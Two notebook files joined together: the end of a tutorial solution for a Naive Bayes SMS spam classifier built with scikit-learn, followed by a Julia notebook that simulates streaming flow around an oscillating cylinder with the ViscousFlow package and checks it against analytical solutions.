Solution: Step 3: Compute P(F,I) and store in p_f_i
'''
p_f_i = p_j_text + p_g_text
print('Probability of the words freedom and immigration being said is: ', format(p_f_i))
# Now we can compute `P(J|F,I)`, the probability of Jill Stein saying the words Freedom and Immigration, and `P(G|F,I)`, the probability of Gary Johnson saying the words Freedom and Immigration.
'''
Instructions:
Compute P(J|F,I) using the formula P(J|F,I) = (P(J) * P(F|J) * P(I|J)) / P(F,I) and store it in a variable p_j_fi
'''
'''
Solution
'''
p_j_fi = p_j_text / p_f_i
print('The probability of Jill Stein saying the words Freedom and Immigration: ', format(p_j_fi))
'''
Instructions:
Compute P(G|F,I) using the formula P(G|F,I) = (P(G) * P(F|G) * P(I|G)) / P(F,I) and store it in a variable p_g_fi
'''
'''
Solution
'''
p_g_fi = p_g_text / p_f_i
print('The probability of Gary Johnson saying the words Freedom and Immigration: ', format(p_g_fi))
# And as we can see, just like in the Bayes' theorem case, the sum of our posteriors is equal to 1. Congratulations! You have implemented the Naive Bayes' theorem from scratch. Our analysis shows that there is only a 6.7% chance that Jill Stein of the Green Party uses the words 'freedom' and 'immigration' in her speech, compared to the 93.3% chance for Gary Johnson of the Libertarian Party.
# Another, more generic example of Naive Bayes' in action is when we search for the term 'Sacramento Kings' in a search engine. In order for us to get results pertaining to the Sacramento Kings NBA basketball team, the search engine needs to be able to associate the two words together and not treat them individually. Otherwise we would get results of images tagged with 'Sacramento', like pictures of city landscapes, and images of 'Kings', which could be pictures of crowns or kings from history, when what we are looking for are images of the basketball team. This is a classic case of a search engine treating the words as independent entities and hence being 'naive' in its approach.
#
#
# Applying this to our problem of classifying messages as spam, the Naive Bayes algorithm *looks at each word individually and not as associated entities* with any kind of link between them. In the case of spam detectors, this usually works as there are certain red flag words which can almost guarantee its classification as spam, for example emails with words like 'viagra' are usually classified as spam.
# ### Step 5: Naive Bayes implementation using scikit-learn ###
#
# Thankfully, sklearn has several Naive Bayes implementations that we can use, so we do not have to do the math from scratch. We will be using scikit-learn's `sklearn.naive_bayes` module to make predictions on our dataset.
#
# Specifically, we will be using the multinomial Naive Bayes implementation. This particular classifier is suitable for classification with discrete features (such as, in our case, word counts for text classification). It takes in integer word counts as its input. On the other hand, Gaussian Naive Bayes is better suited for continuous data, as it assumes that the input data has a Gaussian (normal) distribution.
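# A tiny illustration of that distinction (all numbers below are made up): `MultinomialNB` consumes integer count features, while `GaussianNB` fits a normal distribution to each continuous feature:

```python
import numpy as np
from sklearn.naive_bayes import MultinomialNB, GaussianNB

# Made-up word-count rows (discrete features) for MultinomialNB
counts = np.array([[2, 0, 1], [0, 3, 0], [1, 1, 4]])
count_labels = np.array([0, 1, 1])
mnb = MultinomialNB().fit(counts, count_labels)
print(mnb.predict([[2, 0, 0]]))  # matches the class-0 count profile

# Made-up continuous measurements (one feature) for GaussianNB
measurements = np.array([[1.2], [0.9], [3.4], [3.1]])
cont_labels = np.array([0, 0, 1, 1])
gnb = GaussianNB().fit(measurements, cont_labels)
print(gnb.predict([[3.0]]))  # much closer to the class-1 mean
```

# For our SMS data the features are word counts, which is why the multinomial variant is the right fit.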
'''
Instructions:
We have loaded the training data into the variable 'training_data' and the testing data into the
variable 'testing_data'.
Import the MultinomialNB classifier and fit the training data into the classifier using fit(). Name your classifier
'naive_bayes'. You will be training the classifier using 'training_data' and y_train' from our split earlier.
'''
'''
Solution
'''
from sklearn.naive_bayes import MultinomialNB
naive_bayes = MultinomialNB()
naive_bayes.fit(training_data, y_train)
'''
Instructions:
Now that our algorithm has been trained using the training data set we can now make some predictions on the test data
stored in 'testing_data' using predict(). Save your predictions into the 'predictions' variable.
'''
'''
Solution
'''
predictions = naive_bayes.predict(testing_data)
# Now that predictions have been made on our test set, we need to check the accuracy of our predictions.
# ### Step 6: Evaluating our model ###
#
# Now that we have made predictions on our test set, our next goal is to evaluate how well our model is doing. There are various mechanisms for doing so, but first let's do quick recap of them.
#
# ** Accuracy ** measures how often the classifier makes the correct prediction. It’s the ratio of the number of correct predictions to the total number of predictions (the number of test data points).
#
# ** Precision ** tells us what proportion of messages we classified as spam, actually were spam.
# It is a ratio of true positives(words classified as spam, and which are actually spam) to all positives(all words classified as spam, irrespective of whether that was the correct classification), in other words it is the ratio of
#
# `[True Positives/(True Positives + False Positives)]`
#
# ** Recall(sensitivity)** tells us what proportion of messages that actually were spam were classified by us as spam.
# It is a ratio of true positives(words classified as spam, and which are actually spam) to all the words that were actually spam, in other words it is the ratio of
#
# `[True Positives/(True Positives + False Negatives)]`
#
# For classification problems that are skewed in their class distributions, like ours, accuracy by itself is not a very good metric. For example, if we had 100 text messages and only 2 were spam while the other 98 were not, we could classify 90 messages as not spam (including the 2 that were spam, hence false negatives) and 10 as spam (all 10 false positives) and still get a reasonably good accuracy score. For such cases, precision and recall come in very handy. These two metrics can be combined to get the F1 score, which is the weighted average of the precision and recall scores. This score can range from 0 to 1, with 1 being the best possible F1 score.
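# The arithmetic for that skewed scenario can be checked directly (counts taken from the description above):

```python
# 100 messages: 2 spam, 98 ham. The classifier marks 10 ham messages
# as spam and misses both real spam messages.
tp, fp = 0, 10   # no true positives, 10 false positives
fn, tn = 2, 88   # both spam missed, 88 ham correctly kept

accuracy = (tp + tn) / (tp + fp + fn + tn)
precision = tp / (tp + fp) if (tp + fp) else 0.0
recall = tp / (tp + fn) if (tp + fn) else 0.0
print(accuracy, precision, recall)  # 0.88 0.0 0.0
```

# An accuracy of 0.88 looks respectable even though the classifier caught zero spam, which is exactly why precision and recall matter here.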
# We will be using all 4 metrics to make sure our model does well. For all 4 metrics whose values can range from 0 to 1, having a score as close to 1 as possible is a good indicator of how well our model is doing.
'''
Instructions:
Compute the accuracy, precision, recall and F1 scores of your model using your test data 'y_test' and the predictions
you made earlier stored in the 'predictions' variable.
'''
'''
Solution
'''
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
print('Accuracy score: ', format(accuracy_score(y_test, predictions)))
print('Precision score: ', format(precision_score(y_test, predictions)))
print('Recall score: ', format(recall_score(y_test, predictions)))
print('F1 score: ', format(f1_score(y_test, predictions)))
# ### Step 7: Conclusion ###
#
# One of the major advantages that Naive Bayes has over other classification algorithms is its ability to handle an extremely large number of features. In our case, each word is treated as a feature and there are thousands of different words. Also, it performs well even in the presence of irrelevant features and is relatively unaffected by them. Its other major advantage is its relative simplicity. Naive Bayes works well right out of the box, and tuning its parameters is rarely necessary, except in cases where the distribution of the data is known.
# It rarely overfits the data. Another important advantage is that its model training and prediction times are very fast for the amount of data it can handle. All in all, Naive Bayes really is a gem of an algorithm!
#
# Congratulations! You have successfully designed a model that can efficiently predict if an SMS message is spam or not!
#
# Thank you for learning with us!
DSND_Term1-master/lessons/Supervised/2_NaiveBayes/Bayesian_Inference_solution.ipynb
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.1.0
# language: julia
# name: julia-1.1
# ---
# # Calculation of streaming flows in package `ViscousFlow`
using ViscousFlow
import ViscousFlow.Fields: curl
include("./Streaming.jl")
using Plots
pyplot()
clibrary(:colorbrewer)
default(grid = false)
using Statistics
# ### Solve for small-amplitude oscillation of a cylindrical body
# The motion of the body is described by oscillatory small-amplitude translation,
#
# $V_b(\xi,t) = \epsilon \hat{U}(t)$
#
# where $\epsilon \ll 1$, $\hat{U}(t)$ is a periodic velocity with unit amplitude, and $\xi \in S_b$ (i.e. it lies on the body surface). The associated position of any point on the surface of the body is then described by
#
# $X_b(\xi,t) = \xi + \epsilon \int_0^t \hat{U}(\tau)d\tau.$
#
# We will write the flow field in asymptotic form, e.g. $v = \epsilon v_1 + \epsilon^2 v_2$, and seek to solve two asymptotic levels of equation (for vorticity)
#
# $\dfrac{\partial w_1}{\partial t} - \dfrac{1}{Re} \nabla^2 w_1 = 0$
#
# subject to boundary condition $v_1(\xi,t) = \hat{U}(t)$ for all $\xi \in S_b$. Note that the boundary condition is applied at the initial location of the surface, not its time-varying location.
#
# And at second order,
#
# $\dfrac{\partial w_2}{\partial t} - \dfrac{1}{Re} \nabla^2 w_2 = -\nabla\cdot(v_1 w_1),$
#
# subject to boundary condition $v_2(\xi,t) = -\int_0^t \hat{U}(\tau)d\tau \cdot \nabla v_1(\xi,t)$ for all $\xi \in S_b$. This is also applied at the initial location of the surface.
#
# Thus, to solve this problem, we will set up a state vector that contains $w_1$, $w_2$, and an unscaled 'body' state $x_c$, $y_c$. These latter components will be used to hold the components of $\Delta\hat{X} \equiv \int_0^t \hat{U}(\tau)d\tau$.
#
# A fluid particle, initially at a location $x$, is subjected to a slightly different velocity, $U(x,t)$, over the ensuing oscillation period, since it is advected by the local velocity to sample nearby points. Its first-order velocity is simply $U_1(x,t) = v_1(x,t)$. Its second order velocity, however, is
#
# $U_2(x,t) = v_2(x,t) + \int_0^t v_1(x,\tau)d\tau \cdot \nabla v_1(x,t)$
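# (A sketch of where this expression comes from: evaluate the velocity field at the particle's displaced position and Taylor expand about $x$,

```latex
U(x,t) = v\bigl(X_p(x,t),t\bigr)
       \approx v(x,t) + \epsilon \int_0^t v_1(x,\tau)\,d\tau \cdot \nabla v(x,t) + O(\epsilon^3)
       = \epsilon\, v_1 + \epsilon^2 \Bigl( v_2 + \int_0^t v_1(x,\tau)\,d\tau \cdot \nabla v_1 \Bigr) + O(\epsilon^3)
```

# so collecting the $O(\epsilon^2)$ terms reproduces the expression for $U_2$ above.)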
#
# In particular, if the particle is initially on the surface, $x \in S_b$, then $v_1 = \hat{U}$, and the second term of this expression above cancels $v_2$, so that $U_2 = 0$. This ensures that the particle continues to oscillate with the body's surface velocity. Let us define an Eulerian displacement field,
#
# $\Delta X(x,t) = \int_0^t v(x,\tau)d\tau, \quad \Delta X(x,0) = 0,$
#
# or, equivalently,
#
# $\dfrac{d\Delta X}{dt} = v(x,t), \quad \Delta X(x,0) = 0.$
#
# Then, expanding $\Delta X$ in an asymptotic sequence, $\Delta X = \epsilon \Delta X_1 + \epsilon^2 \Delta X_2$, we have
#
# $U_2(x,t) = v_2(x,t) + \Delta X_1(x,t) \cdot \nabla v_1(x,t)$
#
# Let us define a drift displacement, $\Delta X_d$, by the solution of
#
# $\dfrac{d\Delta X_d}{dt} = \Delta X_1(x,t) \cdot \nabla v_1(x,t), \quad \Delta X_d(x,0) = 0$
#
# The motion of a fluid particle, starting at $x$, is thus given by
#
# $X_p(x,t) = x + \epsilon \Delta X_1(x,t) + \epsilon^2 (\Delta X_2(x,t) + \Delta X_d(x,t))$
#
# These represent the integral curves of the velocity field. If we look only at these integral curves over one period, then we seek the net displacement made by a particle over this period,
#
# $X_p(x,T) - x = \Delta X(x,T) + \epsilon^2 \Delta X_d(x,T) = \int_0^T U(x,\tau)d\tau \equiv T \overline{U}(x).$
#
# We only need a mean velocity field for this purpose.
# #### Set the oscillation parameters
Re = 40.0
ϵ = 0.1
Ω = 1.0 # angular frequency
Ax = 1.0 # x amplitude (before scaling by ϵ)
ϕx = 0.0 # phase lead of x motion
Ay = 0.0 # y amplitude
ϕy = 0.0 # phase lead of y motion
oscil = RigidBodyMotions.RigidBodyMotion(RigidBodyMotions.Oscillation(Ω,Ax,ϕx,Ay,ϕy))
# #### Let's plot it just to check
# Keep in mind that this is the 'unscaled' form of the motion; the actual motion would be multiplied by $\epsilon$.
t = range(0.0,stop=4π,length=401)
u = map(ti -> real(oscil(ti)[2]),t) # u component of velocity of centroid
plot(t,u)
# ### Generate the analytical solution
p = Params(0.1,Re)
# First-order solution
# +
K = 1
Ψ₁ = ComplexFunc(r -> -p.C/r + 2Y(r)/p.γ)
W₁ = D²(Ψ₁,K) # note that this is actually the negative of the vorticity. We will account for this when we evaluate it.
Ur₁, Uθ₁ = curl(Ψ₁,K)
# for verifying the solution
LW₁ = D²(W₁,K);
resid1 = ComplexFunc(r -> LW₁(r)+im*p.Re*W₁(r))
println("Maximum residual on solution = ",maximum(abs.(resid1.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨ₁ = ComplexFunc(r -> derivative(Ψ₁,r))
bcresid1 = Ψ₁(1) - 1
bcresid2 = dΨ₁(1) - 1
println("BC residual on Ψ₁(1) = ",abs(bcresid1))
println("BC residual on dΨ₁(1) = ",abs(bcresid2))
# -
function ω₁ex(x,y,t)
r = sqrt(x^2+y^2)
return real(-W₁(r)*y/r*exp.(-im*t))
end
function u₁ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
return real.((Ur₁(r)*coseval^2-Uθ₁(r)*sineval^2)*exp.(-im*t))
end
function v₁ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
return real.((Ur₁(r)+Uθ₁(r))*coseval*sineval*exp.(-im*t))
end
function ψ₁ex(x,y,t)
r = sqrt(x^2+y^2)
return real(Ψ₁(r)*y/r*exp.(-im*t))
end
# Analytical solution of the steady part
# +
K = 2
fakefact = 1
#f₀ = ComplexFunc(r -> -0.5*p.γ²*p.Re*(0.5*(p.C*conj(X(r))-conj(p.C)*X(r))/r^2 + X(r)*conj(Z(r)) - conj(X(r))*Z(r)))
f₀ = ComplexFunc(r -> -p.γ²*p.Re*(0.5*p.C*conj(X(r))/r^2 + X(r)*conj(Z(r))))
f̃₀ = ComplexFunc(r -> f₀(r) - 0.5*p.γ²*p.Re*(-0.5*conj(Z(r))+0.5*Z(r)))
I⁻¹ = ComplexIntegral(r->f₀(r)/r,1,Inf,length=100000)
I¹ = ComplexIntegral(r->f₀(r)*r,1,Inf,length=100000)
I³ = ComplexIntegral(r->f₀(r)*r^3,1,20,length=400000)
I⁵ = ComplexIntegral(r->f₀(r)*r^5,1,20,length=400000)
Ψs₂ = ComplexFunc(r -> -r^4/48*I⁻¹(r) + r^2/16*I¹(r) + I³(r)/16 + I⁻¹(1)/16 - I¹(1)/8 - fakefact*0.25im*p.γ*Y(1) +
1/r^2*(-I⁵(r)/48-I⁻¹(1)/24+I¹(1)/16 + fakefact*0.25im*p.γ*Y(1)))
Ws₂ = D²(Ψs₂,K)
Usr₂, Usθ₂ = curl(Ψs₂,K)
# for verifying the solution
LWs₂ = D²(Ws₂,K)
resids = ComplexFunc(r -> real(LWs₂(r)-f₀(r)))
println("Maximum residual on solution = ",maximum(abs.(resids.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨs₂ = ComplexFunc(r -> derivative(Ψs₂,r))
bcresids1 = Ψs₂(1)
bcresids2 = real(dΨs₂(1) - 0.25im*W₁(1))
println("BC residual on Ψs₂(1) = ",abs(bcresids1))
println("BC residual on dΨs₂(1) = ",abs(bcresids2))
# -
# Analytical solution of unsteady part
# +
K = 2
fakefact = 1
g₀ = ComplexFunc(r -> 0.5*p.γ²*p.Re*p.C*X(r)/r^2)
g̃₀ = ComplexFunc(r -> g₀(r) - 0.5*p.γ²*p.Re*Z(r))
Kλ = ComplexFunc(r -> H11(1)*H22(r) - H12(1)*H21(r))
IKgr = ComplexIntegral(r -> r*Kλ(r)*g₀(r),1,20,length=400000)
IH21gr = ComplexIntegral(r -> r*H21(r)*g₀(r),1,Inf,length=100000)
Igr⁻¹ = ComplexIntegral(r -> g₀(r)/r,1,Inf,length=100000)
Igr³ = ComplexIntegral(r -> g₀(r)*r^3,1,20,length=400000)
Ig¹ = ComplexFunc(r -> 0.25im*π/(p.λ²*H11(1))*IKgr(r)*H21(r))
Ig² = ComplexFunc(r -> 0.25im*π/(p.λ²*H11(1))*IH21gr(r)*Kλ(r))
Ig³ = ComplexFunc(r -> 1/(p.λ²*p.λ*H11(1))*((H21(r)-H21(1)/r^2)*Igr⁻¹(1)+IH21gr(1)/r^2))
Ig⁴ = ComplexFunc(r -> -0.25/p.λ²*(Igr⁻¹(r)*r^2-Igr⁻¹(1)/r^2+Igr³(r)/r^2))
Ψ₂ = ComplexFunc(r -> Ig¹(r) + Ig²(r) + Ig³(r) + Ig⁴(r) + fakefact*0.5im/sqrt(2)*Y(1)/H11(1)*(H21(r)-H21(1)/r^2))
Ψ̃₂ = ComplexFunc(r -> Ψ₂(r)+ 0.5im*(-p.C/r^2 + Z(r))) # cylinder-fixed reference frame... not used
W₂ = D²(Ψ₂,K)
Ur₂, Uθ₂ = curl(Ψ₂,K);
# for verifying the solution
LW₂ = D²(W₂,K);
resid = ComplexFunc(r -> LW₂(r)+2im*p.Re*W₂(r)-g₀(r))
println("Maximum residual on solution = ",maximum(abs.(resid.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨ₂ = ComplexFunc(r -> derivative(Ψ₂,r))
bcresid1 = Ψ₂(1)
bcresid2 = dΨ₂(1) - 0.5im*p.γ*Y(1)
println("BC residual on Ψ₂(1) = ",abs(bcresid1))
println("BC residual on dΨ₂(1) = ",abs(bcresid2))
# -
function ω₂ex(x,y,t)
r = sqrt(x^2+y^2)
sin2eval = 2*x*y/r^2
return real(-Ws₂(r) .- W₂(r)*exp.(-2im*t))*sin2eval
end
function u₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
cos2eval = coseval^2-sineval^2
sin2eval = 2*coseval*sineval
ur = real.(Usr₂(r) .+ Ur₂(r)*exp.(-2im*t))*cos2eval
uθ = real.(Usθ₂(r) .+ Uθ₂(r)*exp.(-2im*t))*sin2eval
return ur*coseval .- uθ*sineval
end
function v₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
cos2eval = coseval^2-sineval^2
sin2eval = 2*coseval*sineval
ur = real.(Usr₂(r) .+ Ur₂(r)*exp.(-2im*t))*cos2eval
uθ = real.(Usθ₂(r) .+ Uθ₂(r)*exp.(-2im*t))*sin2eval
return ur*sineval .+ uθ*coseval
end
function ψ₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
sin2eval = 2*coseval*sineval
return real(Ψs₂(r) .+ Ψ₂(r)*exp.(-2im*t))*sin2eval
end
function ψ̄₂ex(x,y)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
sin2eval = 2*coseval*sineval
return real(Ψs₂(r))*sin2eval
end
# #### Set up points on the body:
n = 150;
body = Ellipse(1.0,n)
# Transform the body with a specified initial position and orientation.
cent = (0.0,0.0)
α = 0.0
T = RigidTransform(cent,α)
T(body) # transform the body to the current configuration
# Now set up the coordinate data for operator construction
coords = VectorData(body.x,body.y);
# #### Set up the domain
xlim = (-4.0,4.0)
ylim = (-4.0,4.0)
plot(body,xlim=xlim,ylim=ylim)
# Set the cell size and time step size
Δx = 0.0202
Δt = min(π*0.5*Δx,π*0.5*Δx^2*Re)
# ### Now set up the system
# The discretized equations include the constraint forces on the surface, used to enforce the boundary conditions. The first level can be written as
#
# $\dfrac{dw_1}{dt} - \dfrac{1}{Re}Lw_1 + C^T E^T f_1 = 0,\quad -E C L^{-1}w_1 = \hat{U}, \quad w_1(0) = 0$
#
# where $E$ is the interpolation operator, $E^T$ is the regularization operator, $C^T$ is the rot (curl) operator, and $f_1$ represents the vector of discrete surface forces.
#
# The second asymptotic level is written as
#
# $\dfrac{dw_2}{dt} - \dfrac{1}{Re}Lw_2 + C^T E^T f_2 = -N(w_1),\quad -E C L^{-1}w_2 = \Delta\hat{X}\cdot E G C L^{-1}w_1, \quad w_2(0) = 0$
#
# where $N$ represents the non-linear convective term. We must also advance the state $\Delta\hat{X}$:
#
# $\dfrac{d\Delta\hat{X}}{dt} = \hat{U}, \quad \Delta\hat{X}(0) = 0$
#
# To account for the fluid particle motion, we will also integrate the Eulerian displacement fields $\Delta X_1$ and $\Delta X_2$:
#
# $\dfrac{d\Delta X_1}{dt} = v_1, \quad \Delta X_1(x,0) = 0$
#
# and
#
# $\dfrac{d\Delta X_2}{dt} = v_2, \quad \Delta X_2(x,0) = 0$
#
# The construction of the NavierStokes system creates and stores the regularization and interpolation matrices. These will not change with time, since the boundary conditions are applied at the initial location of the surface points.
#
#
ddftype = Fields.Goza
sys = NavierStokes(Re,Δx,xlim,ylim,Δt, X̃ = coords, isstore = true, isasymptotic = true, isfilter = false, ddftype = ddftype)
# Set up the state vector and constraint force vector for a static body
w₀ = Nodes(Fields.Dual,size(sys))
ΔX = Edges(Primal,w₀)
f1 = VectorData(coords);
xg, yg = coordinates(w₀,sys.grid)
# Make the tuple data structures. The state tuple holds the first and second asymptotic level vorticity, the Eulerian displacement field for each level, and the two components of the unscaled centroid displacement of the body. The last three parts have no constraints, so we set the force to empty vectors.
u = (zero(w₀),zero(w₀),zero(ΔX),zero(ΔX),[0.0,0.0])
f = (zero(f1),zero(f1),Vector{Float64}(),Vector{Float64}(),Vector{Float64}())
TU = typeof(u)
TF = typeof(f)
# #### Define operators that act upon the tuples and the right-hand sides of the equations and constraints.
# The right-hand side of the first-order equation is 0. The right-hand side of the second-order equation is the negative of the non-linear convective term, based on the first-order solution; for this, we use the predefined `r₁`. The right-hand side of the Eulerian displacement field equations are just the corresponding velocities at those levels. The right-hand side of the body update equation is the unscaled velocity.
function TimeMarching.r₁(u::TU,t::Float64)
_,ċ,_,_,α̇,_ = oscil(t)
return zero(u[1]), TimeMarching.r₁(u[1],t,sys), lmul!(-1,curl(sys.L\u[1])), lmul!(-1,curl(sys.L\u[2])), [real(ċ),imag(ċ)]
end
# The right-hand side of the first constraint equation is the unscaled rigid-body velocity, evaluated at the surface points. The right-hand side of the second constraint equation is $-\hat{X}\cdot\nabla v_1$. The Eulerian displacement and the body update equations have no constraint, so these are set to an empty vector.
gradopx = Regularize(sys.X̃,cellsize(sys);I0=origin(sys),issymmetric=true,ddftype=ddftype,graddir=1)
gradopy = Regularize(sys.X̃,cellsize(sys);I0=origin(sys),issymmetric=true,ddftype=ddftype,graddir=2)
dEx = InterpolationMatrix(gradopx,sys.Fq,sys.Vb)
dEy = InterpolationMatrix(gradopy,sys.Fq,sys.Vb)
nothing
# +
function TimeMarching.r₂(u::TU,t::Float64)
fact = 2 # not sure how to explain this factor yet.
_,ċ,_,_,α̇,_ = oscil(t)
U = (real(ċ),imag(ċ))
# -ΔX̂⋅∇v₁
Δx⁻¹ = 1/cellsize(sys)
sys.Fq .= curl(sys.L\u[1]) # -v₁
sys.Vb .= dEx*sys.Fq # dv₁/dx*Δx
sys.Vb.u .*= -fact*Δx⁻¹*u[5][1]
sys.Vb.v .*= -fact*Δx⁻¹*u[5][1]
Vb = deepcopy(sys.Vb) # -X⋅dv₁/dx
sys.Vb .= dEy*sys.Fq # dv₁/dy*Δx
sys.Vb.u .*= -fact*Δx⁻¹*u[5][2]
sys.Vb.v .*= -fact*Δx⁻¹*u[5][2]
Vb .+= sys.Vb # -X⋅dv₁/dx - Y.⋅dv₁/dy
return U + α̇ × (sys.X̃ - body.cent), Vb, Vector{Float64}(), Vector{Float64}(), Vector{Float64}()
end
# -
# The integrating factor for the first two equations is simply the one associated with the usual viscous term. The last three equations have no term that needs an integrating factor, so we set their integrating factor operators to the identity, I.
using LinearAlgebra
plans = ((t,u) -> Fields.plan_intfact(t,u,sys),(t,u) -> Fields.plan_intfact(t,u,sys),(t,u) -> Identity(),(t,u) -> Identity(),(t,u)-> I)
# The constraint operators for the first two equations are the usual ones for a stationary body and are precomputed. There are no constraints or constraint forces for the last three equations.
function TimeMarching.plan_constraints(u::TU,t::Float64)
B₁ᵀ, B₂ = TimeMarching.plan_constraints(u[1],t,sys) # These are used by both the first and second equations
return (B₁ᵀ,B₁ᵀ,f->zero(u[3]),f->zero(u[4]),f->zero(u[5])), (B₂,B₂,u->Vector{Float64}(),u->Vector{Float64}(),u->Vector{Float64}())
end
# Set up the integrator here
@time ifherk = IFHERK(u,f,sys.Δt,plans,TimeMarching.plan_constraints,
(TimeMarching.r₁,TimeMarching.r₂),rk=TimeMarching.RK31,isstored=true)
# ### Advance the system!
# Initialize the state vector and the history vectors
# +
t = 0.0
u = (zero(w₀),zero(w₀),zero(ΔX),zero(ΔX),[0.0,0.0])
thist = Float64[];
w1hist = [];
w2hist = [];
dX1hist = [];
dX2hist = [];
X̂hist = [];
tsample = Δt; # rate at which to store field data
# -
# Set the time range to integrate over.
tf = 8π
T = Δt:Δt:tf;
@time for ti in T
global t, u, f = ifherk(t,u)
push!(thist,t)
if (isapprox(mod(t,tsample),0,atol=1e-6) || isapprox(mod(t,tsample),tsample,atol=1e-6))
push!(w1hist,deepcopy(u[1]))
push!(w2hist,deepcopy(u[2]))
push!(dX1hist,deepcopy(u[3]))
push!(dX2hist,deepcopy(u[4]))
push!(X̂hist,deepcopy(u[5]))
end
end
println("solution completed through time t = ",t)
# #### Some functions to compute physical quantities
function vorticity(w::Nodes{Fields.Dual},sys)
ω = deepcopy(w)
return rmul!(ω,1/cellsize(sys))
end
function velocity(w::Nodes{Fields.Dual},sys)
return rmul!(curl(sys.L\w),-1)
end
function streamfunction(w::Nodes{Fields.Dual},sys)
return rmul!(sys.L\w,-cellsize(sys))
end
function nl(w::Nodes{Fields.Dual},sys)
return rmul!(TimeMarching.r₁(w,0.0,sys),1/cellsize(sys))
end
# #### Compute an average over the previous period
function average(hist::Vector{Any},itr)
avg = zero(hist[1])
return avg .= mapreduce(x -> x/length(itr),+,hist[itr]);
end
# #### Plotting first order solution
iplot = length(w1hist) # index of time step for plotting
ω₁ = vorticity(w1hist[iplot],sys)
q₁ = velocity(w1hist[iplot],sys)
ψ₁ = streamfunction(w1hist[iplot],sys)
nothing
xg,yg = coordinates(w₀,sys.grid)
plot(xg,yg,ω₁,levels=range(-10,10,length=30),color=:RdBu)
plot!(body)
plot(xg,yg,ψ₁,levels=range(-1,1,length=31),color=:RdBu)
plot!(body,fill=:false)
ix = 201
plot(yg,ω₁[ix,:],ylim=(-10,10),xlim=(1,4),label="DNS",xlabel="y")
plot!(yg,map(y -> ω₁ex(xg[ix],y,thist[iplot]),abs.(yg)),label="Analytical")
#plot!(yg,-real(W₁.(abs.(yg))*exp(-im*thist[iplot])))
# #### History of DNS results at an observation point
# Not yet using interpolation, so we specify the indices of the observation point rather than x,y coordinates.
# The following functions pick off the vorticity and velocity histories at an index pair. Note that u and v components that share the same indices are at different physical locations, and each are at different locations from vorticity.
function vorticity_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
return map(x -> vorticity(x,sys)[i,j],whist)
end
function velocity_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
tmp = reshape(collect(Iterators.flatten(
map(x -> (q = velocity(x,sys); [q.u[i,j], q.v[i,j]]),whist))),
2,length(whist))
return tmp[1,:], tmp[2,:]
end
# This computes the history of the rhs of the second-order equation at the sample point
function nl_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
return map(w1 -> TimeMarching.r₁(w1,0.0,sys)[i,j]/cellsize(sys),whist)
end
function centroid_history(Xhist)
tmp = reshape(collect(Iterators.flatten(Xhist)),2,length(Xhist))
return tmp[1,:], tmp[2,:]
end
sampij = (201,135) # indices of sample point
ω₁hist = vorticity_history(sampij,w1hist,sys);
# Get coordinates of sample point on dual node grid
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
reval
plot(thist,ω₁hist,label="DNS",ylim=(-10,10))
plot!(thist,ω₁ex(xeval,yeval,thist),label="Analytical") # note that we correct the sign of W₁ here
#plot!(thist,real.(-W₁(reval)*sineval*exp.(-im*thist)),label="Analytical") # note that we correct the sign of W₁ here
u₁hist, v₁hist = velocity_history(sampij,w1hist,sys);
# Get the coordinates of the sample point in the u-component edges for plotting this component
xuedge, yuedge, xvedge, yvedge = coordinates(Edges(Primal,w₀),sys.grid)
xeval = xuedge[sampij[1]]
yeval = yuedge[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
plot(thist,u₁hist,ylim=(-2,2),label="DNS")
plot!(thist,u₁ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
# Plot the centroid history
xhist, yhist = centroid_history(X̂hist)
plot(thist,xhist,label="X̂c")
plot!(thist,yhist,label="Ŷc")
# #### The second-order equation
iplot = length(w2hist)
ω₂ = vorticity(w2hist[iplot],sys)
q₂ = velocity(w2hist[iplot],sys)
ψ₂ = streamfunction(w2hist[iplot],sys)
nothing
xg,yg = coordinates(w₀,sys.grid)
plot(xg,yg,ω₂,levels=range(-5,5,length=30),color=:RdBu,clim=(-5,5))
plot!(body)
# Compute the average vorticity field over a period, $\overline{w}_2$
iplot = length(w2hist)
itr = iplot-floor(Int,2π/(Ω*Δt))+1:iplot
w2avg = average(w2hist,itr)
ω̄₂ = vorticity(w2avg,sys)
ψ̄₂ = streamfunction(w2avg,sys);
ψ̄₂exfield = Nodes(Fields.Dual,w₀)
ψ̄₂exfield .= [ψ̄₂ex(x,y) for x in xg, y in yg];
plot(xg,yg,ψ̄₂,levels=range(-0.2,0.1,length=31),clim=(1,2),xlim=(0,4),ylim=(0,4))
#plot!(xg,yg,ψ̄₂exfield,levels=range(-0.2,0.1,length=31),clim=(-2,-2),xlim=(0,4),ylim=(0,4))
plot!(body,fillcolor=:black,linecolor=:black)
sqrt(xg[119]^2+yg[119]^2)
ig = 120
plot(sqrt.(xg[ig:end].^2+yg[ig:end].^2),map(i -> ψ̄₂[i,i],ig:length(xg)),ylim=(-1,1),xlim=(1,5),label="DNS",xlabel="r")
plot!(sqrt.(xg[ig:end].^2+yg[ig:end].^2),map((x,y) -> ψ̄₂ex(x,y),xg[ig:end],yg[ig:end]),label="Analytical",grid=:true)
sampij = (240,240) # indices of sample point
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
ω₂hist = vorticity_history(sampij,w2hist,sys);
